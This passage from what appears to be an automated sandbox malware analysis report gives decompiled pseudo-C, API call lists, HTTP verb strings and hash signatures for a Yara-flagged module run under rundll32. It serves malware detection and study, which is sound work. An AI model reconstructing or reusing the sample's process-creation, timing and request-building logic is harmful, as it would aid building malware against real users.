                          											_t77 = 0xf;
                          											__eflags = _t84 - _t77;
                          											if(_t84 <= _t77) {
                          												_t77 = _t84;
                          											}
                          											_t94 = 0;
                          											__eflags = _t77;
                          											if(_t77 < 0) {
                          												L56:
                          												__eflags = _t84 - 0x10;
                          												if(_t84 < 0x10) {
                          													_t86 = _t84 + 1;
                          													__eflags = _t86;
                          													 *0x100a380 = _t86;
                          												}
                          												goto L58;
                          											} else {
                          												do {
                          													_t68 = 0x100a388 + _t94 * 4;
                          													_t94 = _t94 + 1;
                          													__eflags = _t94 - _t77;
                          													 *_t68 = _t110;
                          													_t110 =  *_t68;
                          												} while (_t94 <= _t77);
                          												goto L56;
                          											}
                          										}
                          										_t69 = 0x100a384 + _t84 * 4;
                          										while(1) {
                          											__eflags =  *_t69 - _t110;
                          											if( *_t69 == _t110) {
                          												goto L51;
                          											}
                          											_t93 = _t93 - 1;
                          											_t69 = _t69 - 4;
                          											__eflags = _t93;
                          											if(_t93 > 0) {
                          												continue;
                          											}
                          											goto L51;
                          										}
                          										goto L51;
                          									}
                          									_t87 = _v32;
                          									__eflags =  *_t87 - 0x5a4d;
                          									if( *_t87 != 0x5a4d) {
                          										goto L59;
                          									}
                          									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                          									__eflags =  *_t71 - 0x4550;
                          									if( *_t71 != 0x4550) {
                          										goto L59;
                          									}
                          									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                          									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                          										goto L59;
                          									}
                          									_t78 = _t76 - _t87;
                          									__eflags =  *((short*)(_t71 + 6));
                          									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                          									if( *((short*)(_t71 + 6)) <= 0) {
                          										goto L59;
                          									}
                          									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                          									__eflags = _t78 - _t72;
                          									if(_t78 < _t72) {
                          										goto L46;
                          									}
                          									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                          									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                          										goto L46;
                          									}
                          									__eflags =  *(_t89 + 0x27) & 0x00000080;
                          									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                          										goto L20;
                          									}
                          									goto L46;
                          								}
                          							} else {
                          								goto L16;
                          							}
                          							while(1) {
                          								L16:
                          								__eflags =  *((intOrPtr*)(0x100a388 + _t58 * 4)) - _t110;
                          								if( *((intOrPtr*)(0x100a388 + _t58 * 4)) == _t110) {
                          									break;
                          								}
                          								_t58 = _t58 + 1;
                          								__eflags = _t58 - _t81;
                          								if(_t58 < _t81) {
                          									continue;
                          								}
                          								goto L18;
                          							}
                          							__eflags = _t58;
                          							if(_t58 <= 0) {
                          								goto L5;
                          							}
                          							 *0x100a3c8 = 1;
                          							__eflags =  *0x100a3c8;
                          							if( *0x100a3c8 != 0) {
                          								goto L5;
                          							}
                          							__eflags =  *((intOrPtr*)(0x100a388 + _t58 * 4)) - _t110;
                          							if( *((intOrPtr*)(0x100a388 + _t58 * 4)) == _t110) {
                          								L32:
                          								_t100 = 0;
                          								__eflags = _t58;
                          								if(_t58 < 0) {
                          									L34:
                          									 *0x100a3c8 = 0;
                          									goto L5;
                          								} else {
                          									goto L33;
                          								}
                          								do {
                          									L33:
                          									_t90 = 0x100a388 + _t100 * 4;
                          									_t100 = _t100 + 1;
                          									__eflags = _t100 - _t58;
                          									 *_t90 = _t110;
                          									_t110 =  *_t90;
                          								} while (_t100 <= _t58);
                          								goto L34;
                          							}
                          							_t25 = _t81 - 1; // -1
                          							_t58 = _t25;
                          							__eflags = _t58;
                          							if(_t58 < 0) {
                          								L28:
                          								__eflags = _t81 - 0x10;
                          								if(_t81 < 0x10) {
                          									_t81 = _t81 + 1;
                          									__eflags = _t81;
                          									 *0x100a380 = _t81;
                          								}
                          								_t28 = _t81 - 1; // 0x0
                          								_t58 = _t28;
                          								goto L32;
                          							} else {
                          								goto L25;
                          							}
                          							while(1) {
                          								L25:
                          								__eflags =  *((intOrPtr*)(0x100a388 + _t58 * 4)) - _t110;
                          								if( *((intOrPtr*)(0x100a388 + _t58 * 4)) == _t110) {
                          									break;
                          								}
                          								_t58 = _t58 - 1;
                          								__eflags = _t58;
                          								if(_t58 >= 0) {
                          									continue;
                          								}
                          								break;
                          							}
                          							__eflags = _t58;
                          							if(__eflags >= 0) {
                          								if(__eflags == 0) {
                          									goto L34;
                          								}
                          								goto L32;
                          							}
                          							goto L28;
                          						}
                          						_t75 =  *((intOrPtr*)(_t108 - 8));
                          						__eflags = _t75 - _v8;
                          						if(_t75 < _v8) {
                          							goto L20;
                          						}
                          						__eflags = _t75 - _t108;
                          						if(_t75 >= _t108) {
                          							goto L20;
                          						}
                          						goto L15;
                          					}
                          					L5:
                          					_t63 = 1;
                          					goto L60;
                          				} else {
                          					goto L3;
                          				}
                          			}

                          APIs
                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 01008572
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: MemoryQueryVirtual
                          • String ID:
                          • API String ID: 2850889275-0
                          • Opcode ID: 38f9d8921482af1e89be049d0bea91984d954c97cabec6591085a7431a2c48aa
                          • Instruction ID: 12a5b7b367863828caf4b1272f86d2a79372913995fc2b5ae7030fd1b6b52531
                          • Opcode Fuzzy Hash: 38f9d8921482af1e89be049d0bea91984d954c97cabec6591085a7431a2c48aa
                          • Instruction Fuzzy Hash: 9C619270F007068FFB6B8A2CC89066977E1BB45355F29C4ABE5C6C72C9EB76D8428740
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 05B78EC7
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateProcessUser
                          • String ID:
                          • API String ID: 2217836671-0
                          • Opcode ID: 79525825f026253d4b3980c8f973230ec0b957ce4d0b12f4d3428ac43aed7204
                          • Instruction ID: 6c25f95ded713b61fb77276f3693847cbb513420b89e33b5e90a65bafe1bdb56
                          • Opcode Fuzzy Hash: 79525825f026253d4b3980c8f973230ec0b957ce4d0b12f4d3428ac43aed7204
                          • Instruction Fuzzy Hash: BD11DF3221414DBFDF029E98DD05DEA7FAAFF08364B095255FA2962160C732E871EB80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 05B636D3
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorStatus
                          • String ID:
                          • API String ID: 1596131371-0
                          • Opcode ID: 7037712361cf1c8c102aa318d0f7beb717552da75a1690c78f592676cd20581e
                          • Instruction ID: e7edaedfe807a7d351c5d642d8f93a6619c42a12589a0c2100464082f732f295
                          • Opcode Fuzzy Hash: 7037712361cf1c8c102aa318d0f7beb717552da75a1690c78f592676cd20581e
                          • Instruction Fuzzy Hash: 8EC01236509202BBDF195A50D82993A7E52EB50340F005818B14682060CE35B450D700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                          • Instruction ID: 29b9c5f7282485957f25ca3895f0131a7fb1518da1043a989f667394e27e070a
                          • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                          • Instruction Fuzzy Hash: 5B21A472A04204ABCB10EF68CCC497BB7E5FF44710B0589A9D9568B245E730F915C7E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E0100829C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                          				intOrPtr _v8;
                          				char _v12;
                          				void* __ebp;
                          				signed int* _t43;
                          				char _t44;
                          				void* _t46;
                          				void* _t49;
                          				intOrPtr* _t53;
                          				void* _t54;
                          				void* _t65;
                          				long _t66;
                          				signed int* _t80;
                          				signed int* _t82;
                          				void* _t84;
                          				signed int _t86;
                          				void* _t89;
                          				void* _t95;
                          				void* _t96;
                          				void* _t99;
                          				void* _t106;
                          
                          				_t43 = _t84;
                          				_t65 = __ebx + 2;
                          				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                          				_t89 = _t95;
                          				_t96 = _t95 - 8;
                          				_push(_t65);
                          				_push(_t84);
                          				_push(_t89);
                          				asm("cld");
                          				_t66 = _a8;
                          				_t44 = _a4;
                          				if(( *(_t44 + 4) & 0x00000006) != 0) {
                          					_push(_t89);
                          					E01008407(_t66 + 0x10, _t66, 0xffffffff);
                          					_t46 = 1;
                          				} else {
                          					_v12 = _t44;
                          					_v8 = _a12;
                          					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                          					_t86 =  *(_t66 + 0xc);
                          					_t80 =  *(_t66 + 8);
                          					_t49 = E010084C1(_t66);
                          					_t99 = _t96 + 4;
                          					if(_t49 == 0) {
                          						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                          						goto L11;
                          					} else {
                          						while(_t86 != 0xffffffff) {
                          							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                          							if(_t53 == 0) {
                          								L8:
                          								_t80 =  *(_t66 + 8);
                          								_t86 = _t80[_t86 + _t86 * 2];
                          								continue;
                          							} else {
                          								_t54 =  *_t53();
                          								_t89 = _t89;
                          								_t86 = _t86;
                          								_t66 = _a8;
                          								_t55 = _t54;
                          								_t106 = _t54;
                          								if(_t106 == 0) {
                          									goto L8;
                          								} else {
                          									if(_t106 < 0) {
                          										_t46 = 0;
                          									} else {
                          										_t82 =  *(_t66 + 8);
                          										E010083AC(_t55, _t66);
                          										_t89 = _t66 + 0x10;
                          										E01008407(_t89, _t66, 0);
                          										_t99 = _t99 + 0xc;
                          										E010084A3(_t82[2]);
                          										 *(_t66 + 0xc) =  *_t82;
                          										_t66 = 0;
                          										_t86 = 0;
                          										 *(_t82[2])(1);
                          										goto L8;
                          									}
                          								}
                          							}
                          							goto L13;
                          						}
                          						L11:
                          						_t46 = 1;
                          					}
                          				}
                          				L13:
                          				return _t46;
                          			}

                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                          • Instruction ID: 5fbfcd26009affd3733bd8b36ad05602bf18abcc05a06ef6c39ef491a3bb30e0
                          • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                          • Instruction Fuzzy Hash: 8421D872D002059FEB15DF68C8808ABBBA5FF84310F0AC5A9D9959B295EB30F915C7E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B75C28: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 05B75C5C
                            • Part of subcall function 05B75C28: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 05B75D1D
                            • Part of subcall function 05B75C28: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 05B75D26
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 05B63860
                            • Part of subcall function 05B6A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 05B6A990
                            • Part of subcall function 05B6A976: CreateWaitableTimerA.KERNEL32(05B8A1E8,00000001,?), ref: 05B6A9AD
                            • Part of subcall function 05B6A976: GetLastError.KERNEL32(?,00000000,05B78C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B6A9BE
                            • Part of subcall function 05B6A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,05B78C06,00000000,00000000,0000801C), ref: 05B6A9FE
                            • Part of subcall function 05B6A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,05B78C06,00000000,00000000,0000801C), ref: 05B6AA1D
                            • Part of subcall function 05B6A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05B78C06,00000000,00000000,0000801C), ref: 05B6AA33
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 05B638C3
                          • StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000,00000000,00000000), ref: 05B6393F
                          • StrTrimA.SHLWAPI(00000000,?), ref: 05B63961
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 05B639A1
                            • Part of subcall function 05B6F08E: RtlAllocateHeap.NTDLL(00000000,00000010,76CDF730), ref: 05B6F0B0
                            • Part of subcall function 05B6F08E: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?,?,?,?,05B63899,?), ref: 05B6F0DE
                          • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 05B63A47
                          • CloseHandle.KERNEL32(?), ref: 05B63CD6
                            • Part of subcall function 05B6E2E6: WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,05B63A69,?), ref: 05B6E2F2
                            • Part of subcall function 05B6E2E6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,05B63A69,?), ref: 05B6E320
                            • Part of subcall function 05B6E2E6: ResetEvent.KERNEL32(?,?,?,?,?,05B63A69,?), ref: 05B6E33A
                          • WaitForSingleObject.KERNEL32(?,00000000,?), ref: 05B63A7C
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 05B63A8B
                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 05B63AB8
                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 05B63AD2
                          • _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 05B63B1A
                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF), ref: 05B63B34
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05B63B4A
                          • ReleaseMutex.KERNEL32(?), ref: 05B63B67
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 05B63B78
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 05B63B87
                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 05B63BBB
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 05B63BD5
                          • SwitchToThread.KERNEL32 ref: 05B63BD7
                          • ReleaseMutex.KERNEL32(?), ref: 05B63BE1
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 05B63C1F
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 05B63C2A
                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 05B63C4D
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 05B63C67
                          • SwitchToThread.KERNEL32 ref: 05B63C69
                          • ReleaseMutex.KERNEL32(?), ref: 05B63C73
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 05B63C88
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05B63CEA
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05B63CF6
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05B63D02
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05B63D0E
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05B63D1A
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05B63D26
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05B63D32
                          • RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 05B63D41
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wait$CloseHandleObjectSingle$TimerWaitable$MultipleObjects$HeapMutexRelease_allmul$FreeThread$CreateErrorEventLastSwitchTime$AllocateExitFileOpenResetSystemTrimUser
                          • String ID:
                          • API String ID: 2369282788-0
                          • Opcode ID: e1be5d5325b375044f49a6e24549d20da011e9ca6e90388f6b693e4dba225638
                          • Instruction ID: cdd72b7c80d507d72e9dcc16586a5f2ce5492539414096f4b0680061d47f5f9a
                          • Opcode Fuzzy Hash: e1be5d5325b375044f49a6e24549d20da011e9ca6e90388f6b693e4dba225638
                          • Instruction Fuzzy Hash: 0CE19B71508305AFDB11AF64CC8597ABBEAFB84364F141A6AF596931A0DB38FC00CF12
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlAllocateHeap.NTDLL ref: 05B7F1E5
                          • GetTickCount.KERNEL32 ref: 05B7F1FF
                          • wsprintfA.USER32 ref: 05B7F252
                          • QueryPerformanceFrequency.KERNEL32(?), ref: 05B7F25E
                          • QueryPerformanceCounter.KERNEL32(?), ref: 05B7F269
                          • _aulldiv.NTDLL(?,?,?,?), ref: 05B7F27F
                          • wsprintfA.USER32 ref: 05B7F295
                          • wsprintfA.USER32 ref: 05B7F2AF
                          • wsprintfA.USER32 ref: 05B7F2D4
                          • HeapFree.KERNEL32(00000000,?), ref: 05B7F2E7
                          • wsprintfA.USER32 ref: 05B7F30B
                          • HeapFree.KERNEL32(00000000,?), ref: 05B7F31E
                          • wsprintfA.USER32 ref: 05B7F358
                          • wsprintfA.USER32 ref: 05B7F37C
                          • lstrcat.KERNEL32(?,?), ref: 05B7F3B4
                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 05B7F3CE
                          • GetTickCount.KERNEL32 ref: 05B7F3DE
                          • RtlEnterCriticalSection.NTDLL(05FBC2D0), ref: 05B7F3F2
                          • RtlLeaveCriticalSection.NTDLL(05FBC2D0), ref: 05B7F410
                          • StrTrimA.SHLWAPI(00000000,05B853E8,00000000,05FBC310), ref: 05B7F449
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B7F46B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 05B7F472
                          • lstrcat.KERNEL32(00000000,?), ref: 05B7F479
                          • lstrcat.KERNEL32(00000000,?), ref: 05B7F480
                          • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 05B7F4FA
                          • HeapFree.KERNEL32(00000000,?,00000000), ref: 05B7F50C
                          • HeapFree.KERNEL32(00000000,00000000,00000000,05FBC310), ref: 05B7F51B
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7F52D
                          • HeapFree.KERNEL32(00000000,?), ref: 05B7F53F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Freewsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveTrim_aulldiv
                          • String ID:
                          • API String ID: 4198993012-0
                          • Opcode ID: 5f23d2901680bcf38dcbed03ef03f3e26f4f50bf2474460182a0b5a83b2e611e
                          • Instruction ID: 96a19cfcb76108426d2220f3eb4417924b9ca0144e4367c28bca09d9bd256b5c
                          • Opcode Fuzzy Hash: 5f23d2901680bcf38dcbed03ef03f3e26f4f50bf2474460182a0b5a83b2e611e
                          • Instruction Fuzzy Hash: E0A16671114209AFCB11DFA8EC86E7A3FAAFF08214F04146AF519D7260EB34F819DB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(?,00000000,?,?), ref: 05B77B51
                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05B77BED
                          • lstrcpyn.KERNEL32(00000000,?,?), ref: 05B77C02
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B77C1D
                          • StrChrA.SHLWAPI(?,00000020,00000000,?,?,?), ref: 05B77D04
                          • StrChrA.SHLWAPI(00000001,00000020), ref: 05B77D15
                          • lstrlen.KERNEL32(00000000), ref: 05B77D29
                          • memmove.NTDLL(?,?,00000001), ref: 05B77D39
                          • lstrlen.KERNEL32(?,00000000,?,?,?), ref: 05B77D65
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B77D8B
                          • memcpy.NTDLL(00000000,?,?), ref: 05B77D9F
                          • memcpy.NTDLL(?,?,?), ref: 05B77DBF
                          • HeapFree.KERNEL32(00000000,?), ref: 05B77DFB
                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B77EC1
                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 05B77F09
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                          • String ID: GET $GET $OPTI$OPTI$POST$PUT
                          • API String ID: 3227826163-647159250
                          • Opcode ID: 46cd3a29c65447ba3a1bcbeaba24c9f778d71b227561539ecb877001ee20ef9d
                          • Instruction ID: 145d24f8d5b772dee3613973d180eee4cf166fb82b74170079b33b56458acffd
                          • Opcode Fuzzy Hash: 46cd3a29c65447ba3a1bcbeaba24c9f778d71b227561539ecb877001ee20ef9d
                          • Instruction Fuzzy Hash: 1FE13C71A00209EFDB15DFA8C889ABE7BB9FF04310F144599F9269B251DB30FA51DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlAllocateHeap.NTDLL ref: 05B6E65B
                          • wsprintfA.USER32 ref: 05B6E6C5
                          • wsprintfA.USER32 ref: 05B6E70B
                          • wsprintfA.USER32 ref: 05B6E72C
                          • lstrcat.KERNEL32(00000000,?), ref: 05B6E763
                          • wsprintfA.USER32 ref: 05B6E784
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B6E79E
                          • wsprintfA.USER32 ref: 05B6E7C5
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6E7DA
                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 05B6E7F4
                          • RtlEnterCriticalSection.NTDLL(05FBC2D0), ref: 05B6E815
                          • RtlLeaveCriticalSection.NTDLL(05FBC2D0), ref: 05B6E82F
                            • Part of subcall function 05B7EA15: lstrlen.KERNEL32(00000000,76CC81D0,?,76C85520,773BEEF0,?,00000000,05B6E842,00000000,05FBC310), ref: 05B7EA40
                            • Part of subcall function 05B7EA15: lstrlen.KERNEL32(?,?,00000000,05B6E842,00000000,05FBC310), ref: 05B7EA48
                            • Part of subcall function 05B7EA15: strcpy.NTDLL ref: 05B7EA5F
                            • Part of subcall function 05B7EA15: lstrcat.KERNEL32(00000000,?), ref: 05B7EA6A
                            • Part of subcall function 05B7EA15: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,05B6E842,00000000,05FBC310), ref: 05B7EA87
                          • StrTrimA.SHLWAPI(00000000,05B853E8,00000000,05FBC310), ref: 05B6E864
                            • Part of subcall function 05B68DC7: lstrlen.KERNEL32(05FB8560,76C85520,76CC81D0,773BEEF0,05B6E873,?), ref: 05B68DD7
                            • Part of subcall function 05B68DC7: lstrlen.KERNEL32(?), ref: 05B68DDF
                            • Part of subcall function 05B68DC7: lstrcpy.KERNEL32(00000000,05FB8560), ref: 05B68DF3
                            • Part of subcall function 05B68DC7: lstrcat.KERNEL32(00000000,?), ref: 05B68DFE
                          • lstrcpy.KERNEL32(?,?), ref: 05B6E88D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 05B6E897
                          • lstrcat.KERNEL32(00000000,?), ref: 05B6E8A2
                          • lstrcat.KERNEL32(00000000,?), ref: 05B6E8A9
                          • RtlEnterCriticalSection.NTDLL(05FBC2D0), ref: 05B6E8B4
                          • RtlLeaveCriticalSection.NTDLL(05FBC2D0), ref: 05B6E8D0
                            • Part of subcall function 05B67DF5: memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,05B75583,00000000,00000000), ref: 05B67E46
                            • Part of subcall function 05B67DF5: memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 05B67ED9
                          • HeapFree.KERNEL32(00000000,?,00000001,05FBC310,?,?,?), ref: 05B6E997
                          • HeapFree.KERNEL32(00000000,?,?), ref: 05B6E9AF
                          • HeapFree.KERNEL32(00000000,?,00000000,05FBC310), ref: 05B6E9BD
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B6E9CB
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B6E9D6
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$lstrcatwsprintf$CriticalSectionlstrlen$lstrcpy$AllocateEnterLeaveTrimmemcpy$strcpy
                          • String ID:
                          • API String ID: 4032678529-0
                          • Opcode ID: dcdf23b368fa2ff96121d499dc17f89bcb75835a0f0c914b333f5dfda9063390
                          • Instruction ID: 4793367c9d9874dad6ff589da893b3cb6a620b92595afd18a4a70674e79ec81f
                          • Opcode Fuzzy Hash: dcdf23b368fa2ff96121d499dc17f89bcb75835a0f0c914b333f5dfda9063390
                          • Instruction Fuzzy Hash: 48B15531214205AFCB119FA8DC85E3A7BEAFF88314F04146AF549DB2A0DB39F805DB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E0100300E(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
                          				intOrPtr _v4;
                          				signed int _v8;
                          				int* _v12;
                          				char* _v16;
                          				intOrPtr _v20;
                          				void* _v24;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				void* _v40;
                          				void* __ebx;
                          				void* __edi;
                          				long _t66;
                          				intOrPtr _t67;
                          				intOrPtr _t68;
                          				intOrPtr _t69;
                          				intOrPtr _t70;
                          				intOrPtr _t71;
                          				void* _t74;
                          				intOrPtr _t75;
                          				int _t78;
                          				intOrPtr _t79;
                          				int _t82;
                          				intOrPtr _t83;
                          				intOrPtr _t84;
                          				void* _t86;
                          				void* _t89;
                          				intOrPtr _t93;
                          				intOrPtr _t97;
                          				intOrPtr* _t99;
                          				int* _t105;
                          				int* _t115;
                          				char** _t117;
                          				char* _t118;
                          				intOrPtr* _t123;
                          				intOrPtr* _t125;
                          				intOrPtr* _t127;
                          				intOrPtr* _t129;
                          				intOrPtr _t132;
                          				intOrPtr _t136;
                          				int _t139;
                          				intOrPtr _t141;
                          				int _t144;
                          				void* _t145;
                          				intOrPtr _t159;
                          				void* _t161;
                          				int _t162;
                          				void* _t163;
                          				void* _t164;
                          				long _t165;
                          				intOrPtr* _t166;
                          				intOrPtr* _t167;
                          				intOrPtr _t168;
                          				intOrPtr* _t171;
                          				char** _t174;
                          				char** _t176;
                          				char** _t177;
                          				void* _t182;
                          
                          				_t66 = __eax;
                          				_t174 =  &_v16;
                          				_t145 = _a20;
                          				_a20 = 8;
                          				if(__eax == 0) {
                          					_t66 = GetTickCount();
                          				}
